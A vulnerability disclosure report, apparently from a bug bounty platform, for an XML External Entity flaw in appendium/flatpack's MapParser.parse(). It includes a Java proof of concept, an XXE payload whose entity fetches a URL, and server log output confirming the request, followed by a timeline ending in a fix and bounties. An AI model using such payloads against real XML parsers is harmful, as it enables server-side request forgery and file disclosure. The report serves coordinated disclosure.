Improper Restriction of XML External Entity Reference in appendium/flatpack

Valid

Reported on

Oct 18th 2021

Description

The flatpack vulnerable to XML External Entity (XXE). An attacker that is able to provide a crafted XML file as input to the parse() function in the MapParser.java file may allow an attacker to execute XML External Entities (XXE).

Proof of Concept

import java.io.File;
import java.io.FileReader;
import java.io.Reader;

import net.sf.flatpack.xml.*;


public class Poc {

    @SuppressWarnings({ "unused" })
    public static void main(String[] args) {
        try {
            Reader reader = new FileReader("C:\\Users\\srika\\eclipse-workspace\\poc\\src\\main\\resources\\sample-ssrf.xml");
            MapParser.parse(reader, null);

        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

sample-ssrf.xml

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://127.0.0.1:8800/test.txt">]>
<foo>&xxe;</foo>

#Output

Serving HTTP on :: port 8800 (http://[::]:8800/) ...
::ffff:127.0.0.1 - - [18/Oct/2021 15:10:34] "GET /test.txt HTTP/1.1" 200 -

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 years ago

Srikanth Prathi submitted a

patch

2 years ago

We have contacted a member of the appendium/flatpack team and are waiting to hear back 2 years ago

We have sent a follow up to the appendium/flatpack team. We will try again in 7 days. 2 years ago

Benoit Xhenseval validated this vulnerability 2 years ago

Srikanth Prathi has been awarded the disclosure bounty

The fix bounty is now up for grabs

Benoit Xhenseval marked this as fixed with commit 5ebef7 2 years ago

Srikanth Prathi has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation